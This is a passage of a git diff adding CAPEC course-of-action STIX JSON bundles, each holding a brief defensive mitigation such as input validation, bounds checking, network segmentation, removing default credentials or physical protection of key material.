"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-549-0", + "description": "Employ robust cybersecurity training for all employees.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bce5f53e-f172-44e5-9663-605f8f248104.json b/capec/course-of-action/course-of-action--bce5f53e-f172-44e5-9663-605f8f248104.json new file mode 100644 index 0000000000..b96848d2b8 --- /dev/null +++ b/capec/course-of-action/course-of-action--bce5f53e-f172-44e5-9663-605f8f248104.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--24533359-80e9-4fe3-b713-9cf3172410ff", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bce5f53e-f172-44e5-9663-605f8f248104", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-95-1", + "description": "Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). Make sure that none of them is vulnerable to injection.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bcfdbdbd-ba28-4e96-9aed-e24eafa7f94a.json b/capec/course-of-action/course-of-action--bcfdbdbd-ba28-4e96-9aed-e24eafa7f94a.json new file mode 100644 index 0000000000..69513f7897 --- /dev/null +++ b/capec/course-of-action/course-of-action--bcfdbdbd-ba28-4e96-9aed-e24eafa7f94a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b0ca9c16-9f1e-4a5f-b43f-50e7b76b2ce9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bcfdbdbd-ba28-4e96-9aed-e24eafa7f94a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-563-0", + "description": "Ensure proper permissions on directories that are accessible through a web server. Disallow remote access to the web root. Disable execution on directories within the web root. Ensure that permissions of the web server process are only what is required by not using built-in accounts and instead create specific accounts to limit unnecessary access or permissions overlap across multiple systems.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bd93a4f0-efc9-4872-b258-f5ab4f5e1279.json b/capec/course-of-action/course-of-action--bd93a4f0-efc9-4872-b258-f5ab4f5e1279.json new file mode 100644 index 0000000000..7e878b3738 --- /dev/null +++ b/capec/course-of-action/course-of-action--bd93a4f0-efc9-4872-b258-f5ab4f5e1279.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b45b642e-912a-4a5f-93ee-7b5abf409696", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bd93a4f0-efc9-4872-b258-f5ab4f5e1279", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-158-1", + "description": "Employ appropriate levels of segmentation to your network in accordance with best practices.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bda14fae-49f5-4ad2-a29e-764ae02120dd.json b/capec/course-of-action/course-of-action--bda14fae-49f5-4ad2-a29e-764ae02120dd.json new file mode 100644 index 0000000000..0f0635d3d9 --- /dev/null +++ b/capec/course-of-action/course-of-action--bda14fae-49f5-4ad2-a29e-764ae02120dd.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3654c4bc-2e94-424d-9e49-9b5ab3ca8638", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bda14fae-49f5-4ad2-a29e-764ae02120dd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-70-0", + "description": "Delete all default account credentials that may be put in by the product vendor.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bda50c13-a4a7-473b-a32c-613afa2eafce.json b/capec/course-of-action/course-of-action--bda50c13-a4a7-473b-a32c-613afa2eafce.json new file mode 100644 index 0000000000..e885703fc0 --- /dev/null +++ b/capec/course-of-action/course-of-action--bda50c13-a4a7-473b-a32c-613afa2eafce.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f32cc80c-cd24-4408-89b2-fecf2abd3c96", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bda50c13-a4a7-473b-a32c-613afa2eafce", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-28-0", + "description": "Test to ensure that the software behaves as per specification and that there are no unintended side effects. Ensure that no assumptions about the validity of data are made.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89.json b/capec/course-of-action/course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89.json new file mode 100644 index 0000000000..eb4f36667f --- /dev/null +++ b/capec/course-of-action/course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--38ccfe26-3a25-49f0-807d-93858e910f5c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-198-2", + "description": "Implementation: The victim should configure the browser to minimize active content from untrusted sources.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--be2c5e21-2ecf-45bb-8167-6cbe5589e9ad.json b/capec/course-of-action/course-of-action--be2c5e21-2ecf-45bb-8167-6cbe5589e9ad.json new file mode 100644 index 0000000000..eef2ae5984 --- /dev/null +++ b/capec/course-of-action/course-of-action--be2c5e21-2ecf-45bb-8167-6cbe5589e9ad.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ba33d8a4-e11c-49e2-b9fe-ad52e02fb170", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--be2c5e21-2ecf-45bb-8167-6cbe5589e9ad", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-46-4", + "description": "Do not trust input data from user. Validate all user input.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--be73445d-6303-4867-9786-1fbc879fefad.json b/capec/course-of-action/course-of-action--be73445d-6303-4867-9786-1fbc879fefad.json new file mode 100644 index 0000000000..79856c49d9 --- /dev/null +++ b/capec/course-of-action/course-of-action--be73445d-6303-4867-9786-1fbc879fefad.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--149f734a-214e-4cdb-b82b-fe26ff7f7f1b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--be73445d-6303-4867-9786-1fbc879fefad", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-7", + "description": "Session tokens for specific host", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bebb6871-c5ea-4a91-a0b0-2abbe9ed48dd.json b/capec/course-of-action/course-of-action--bebb6871-c5ea-4a91-a0b0-2abbe9ed48dd.json new file mode 100644 index 0000000000..f22995ed08 --- /dev/null +++ b/capec/course-of-action/course-of-action--bebb6871-c5ea-4a91-a0b0-2abbe9ed48dd.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--dfc1619d-6fd6-48ff-9e0e-53dfd83c535e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bebb6871-c5ea-4a91-a0b0-2abbe9ed48dd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-212-0", + "description": "Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bf09c080-4504-4328-ad60-28b0e4364df5.json b/capec/course-of-action/course-of-action--bf09c080-4504-4328-ad60-28b0e4364df5.json new file mode 100644 index 0000000000..9c27a7410d --- /dev/null +++ b/capec/course-of-action/course-of-action--bf09c080-4504-4328-ad60-28b0e4364df5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7ede8e50-f7fa-4379-b628-5be08d44ee8c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bf09c080-4504-4328-ad60-28b0e4364df5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-130-1", + "description": "Assume all input is malicious. Consider all potentially relevant properties when validating input.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bf365993-fc2b-4a00-8e71-e79e98610b47.json b/capec/course-of-action/course-of-action--bf365993-fc2b-4a00-8e71-e79e98610b47.json new file mode 100644 index 0000000000..ec17c3b531 --- /dev/null +++ b/capec/course-of-action/course-of-action--bf365993-fc2b-4a00-8e71-e79e98610b47.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6d09ffad-42ee-466d-ad48-20098d21b11a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bf365993-fc2b-4a00-8e71-e79e98610b47", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-444-0", + "description": "Assess software and software components during development and prior to deployment to ensure that they function as intended and without any malicious functionality.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bf68de8b-26b1-4932-99d2-6222e81dda83.json b/capec/course-of-action/course-of-action--bf68de8b-26b1-4932-99d2-6222e81dda83.json new file mode 100644 index 0000000000..e03933854f --- /dev/null +++ b/capec/course-of-action/course-of-action--bf68de8b-26b1-4932-99d2-6222e81dda83.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5f038e69-77f7-47fd-bf17-6b48ff6773c6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bf68de8b-26b1-4932-99d2-6222e81dda83", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-51-1", + "description": "Design: Harden registry server and file access permissions", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c0eed457-44b1-4a33-8586-68018a3bbbcf.json b/capec/course-of-action/course-of-action--c0eed457-44b1-4a33-8586-68018a3bbbcf.json new file mode 100644 index 0000000000..63145e77ec --- /dev/null +++ b/capec/course-of-action/course-of-action--c0eed457-44b1-4a33-8586-68018a3bbbcf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3f5f4bf9-a033-4f6a-aa0d-7772569072b8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c0eed457-44b1-4a33-8586-68018a3bbbcf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-237-3", + "description": "Configuration: Get latest updates for the computer.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c0ef85bc-d93c-403f-a208-50e1a983826d.json b/capec/course-of-action/course-of-action--c0ef85bc-d93c-403f-a208-50e1a983826d.json new file mode 100644 index 0000000000..65c8f82706 --- /dev/null +++ b/capec/course-of-action/course-of-action--c0ef85bc-d93c-403f-a208-50e1a983826d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--18482da0-8cdc-4883-91ca-d1ba1a403cd2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c0ef85bc-d93c-403f-a208-50e1a983826d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-20-1", + "description": "In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore's law needs to be taken into account that suggests that computing resources double every eighteen months.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c1177fe7-2157-4379-b994-7102720779ab.json b/capec/course-of-action/course-of-action--c1177fe7-2157-4379-b994-7102720779ab.json new file mode 100644 index 0000000000..bb594ef09e --- /dev/null +++ b/capec/course-of-action/course-of-action--c1177fe7-2157-4379-b994-7102720779ab.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c4481d4b-04ad-4815-99f9-dbd0092d19a6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c1177fe7-2157-4379-b994-7102720779ab", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-14-6", + "description": "Ensure all buffer uses are consistently bounds-checked.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c11a6349-369a-4b58-a5d7-782c51038cd8.json b/capec/course-of-action/course-of-action--c11a6349-369a-4b58-a5d7-782c51038cd8.json new file mode 100644 index 0000000000..2a23855d9e --- /dev/null +++ b/capec/course-of-action/course-of-action--c11a6349-369a-4b58-a5d7-782c51038cd8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--efecd788-7ba5-4ec1-98f1-58f3e1d57390", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c11a6349-369a-4b58-a5d7-782c51038cd8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-273-0", + "description": "Design: Employ strict adherence to interpretations of HTTP messages wherever possible.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c148e0e3-6776-4412-a22d-fe0ab64e3107.json b/capec/course-of-action/course-of-action--c148e0e3-6776-4412-a22d-fe0ab64e3107.json new file mode 100644 index 0000000000..7e57383c2e --- /dev/null +++ b/capec/course-of-action/course-of-action--c148e0e3-6776-4412-a22d-fe0ab64e3107.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d7e5b473-85f0-4b93-9d58-d910747b9d0f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c148e0e3-6776-4412-a22d-fe0ab64e3107", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-219-0", + "description": "Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c1f0798d-f510-4b11-b628-dfa20014d117.json b/capec/course-of-action/course-of-action--c1f0798d-f510-4b11-b628-dfa20014d117.json new file mode 100644 index 0000000000..991272faa6 --- /dev/null +++ b/capec/course-of-action/course-of-action--c1f0798d-f510-4b11-b628-dfa20014d117.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--06aab703-d1f2-45ca-8092-94ccb86d7406", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c1f0798d-f510-4b11-b628-dfa20014d117", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-12-1", + "description": "Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c22b6204-a5ec-49b8-b8b0-017d26455943.json b/capec/course-of-action/course-of-action--c22b6204-a5ec-49b8-b8b0-017d26455943.json new file mode 100644 index 0000000000..4ddac7734a --- /dev/null +++ b/capec/course-of-action/course-of-action--c22b6204-a5ec-49b8-b8b0-017d26455943.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--203d4fcf-5e23-406e-90ec-6053d91e8516", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c22b6204-a5ec-49b8-b8b0-017d26455943", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-103-1", + "description": "Turn off JavaScript, Flash and disable CSS.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c2e44548-0605-43ff-ba41-c2a820c9f7f8.json b/capec/course-of-action/course-of-action--c2e44548-0605-43ff-ba41-c2a820c9f7f8.json new file mode 100644 index 0000000000..fa4747480b --- /dev/null +++ b/capec/course-of-action/course-of-action--c2e44548-0605-43ff-ba41-c2a820c9f7f8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--bb15ae46-9c4c-445a-b9df-2d85f7a1bffb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c2e44548-0605-43ff-ba41-c2a820c9f7f8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-457-0", + "description": "Ensure that proper, physical system access is regulated to prevent an adversary from physically connecting a malicious USB device himself.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c3b2b74c-78d3-4ea4-90e6-66d9552867fe.json b/capec/course-of-action/course-of-action--c3b2b74c-78d3-4ea4-90e6-66d9552867fe.json new file mode 100644 index 0000000000..75b1afe4a7 --- /dev/null +++ b/capec/course-of-action/course-of-action--c3b2b74c-78d3-4ea4-90e6-66d9552867fe.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--65c48e33-1227-4f8a-86d4-8d220ec359a7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c3b2b74c-78d3-4ea4-90e6-66d9552867fe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-579-0", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c431013e-7256-4f54-a26b-b705a2ebdcfd.json b/capec/course-of-action/course-of-action--c431013e-7256-4f54-a26b-b705a2ebdcfd.json new file mode 100644 index 0000000000..7ba8a02dad --- /dev/null +++ b/capec/course-of-action/course-of-action--c431013e-7256-4f54-a26b-b705a2ebdcfd.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--79ab88f2-b0fb-409d-9148-0d78f7318a15", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c431013e-7256-4f54-a26b-b705a2ebdcfd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-273-1", + "description": "Implementation: Encode header information provided by user input so that user-supplied content is not interpreted by intermediaries.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c4587f9b-8252-4e3f-b876-e7ef1681e45c.json b/capec/course-of-action/course-of-action--c4587f9b-8252-4e3f-b876-e7ef1681e45c.json new file mode 100644 index 0000000000..79d54ffa75 --- /dev/null +++ b/capec/course-of-action/course-of-action--c4587f9b-8252-4e3f-b876-e7ef1681e45c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--30425b55-7edb-4504-8dd9-34825a1549e8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c4587f9b-8252-4e3f-b876-e7ef1681e45c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-475-0", + "description": "Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c473eff9-1c98-4dba-9d3e-16a2ea9ac567.json b/capec/course-of-action/course-of-action--c473eff9-1c98-4dba-9d3e-16a2ea9ac567.json new file mode 100644 index 0000000000..b70cae8312 --- /dev/null +++ b/capec/course-of-action/course-of-action--c473eff9-1c98-4dba-9d3e-16a2ea9ac567.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--328a2982-8eab-4fda-9c71-2bdc23989ad8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c473eff9-1c98-4dba-9d3e-16a2ea9ac567", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-88-1", + "description": "Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c4bb2d50-037a-4179-b7d7-e8288bc4ec88.json b/capec/course-of-action/course-of-action--c4bb2d50-037a-4179-b7d7-e8288bc4ec88.json new file mode 100644 index 0000000000..92bd6275d6 --- /dev/null +++ b/capec/course-of-action/course-of-action--c4bb2d50-037a-4179-b7d7-e8288bc4ec88.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--65a64448-174f-4ace-a637-1f7e9623fc08", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c4bb2d50-037a-4179-b7d7-e8288bc4ec88", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-111-1", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c5116127-47a4-45bb-82b5-941771ae2b72.json b/capec/course-of-action/course-of-action--c5116127-47a4-45bb-82b5-941771ae2b72.json new file mode 100644 index 0000000000..4f1d2ba09a --- /dev/null +++ b/capec/course-of-action/course-of-action--c5116127-47a4-45bb-82b5-941771ae2b72.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--21901c69-8848-4ac6-9198-d4ac3d7c41a0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c5116127-47a4-45bb-82b5-941771ae2b72", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-11-0", + "description": "Implementation: Server routines should be determined by content not determined by filename or file extension.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa.json b/capec/course-of-action/course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa.json new file mode 100644 index 0000000000..f49d8055aa --- /dev/null +++ b/capec/course-of-action/course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--50300a86-9720-4510-9fce-c5182f2a0aa7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-193-0", + "description": "Implementation: Perform input validation for all remote content, including remote and user-generated content", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4.json b/capec/course-of-action/course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4.json new file mode 100644 index 0000000000..e6ebfc0658 --- /dev/null +++ b/capec/course-of-action/course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--da8fed37-a9d5-44ff-8a9e-90282db5be13", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "description": "Strong physical security of all devices that contain secret key information. (even when devices are not in use)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c56b417e-08dd-48c9-8d7a-4a2a252008ad.json b/capec/course-of-action/course-of-action--c56b417e-08dd-48c9-8d7a-4a2a252008ad.json new file mode 100644 index 0000000000..cb90b3494a --- /dev/null +++ b/capec/course-of-action/course-of-action--c56b417e-08dd-48c9-8d7a-4a2a252008ad.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f1738397-37f0-47e2-8bd2-d9f584dfd954", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c56b417e-08dd-48c9-8d7a-4a2a252008ad", + 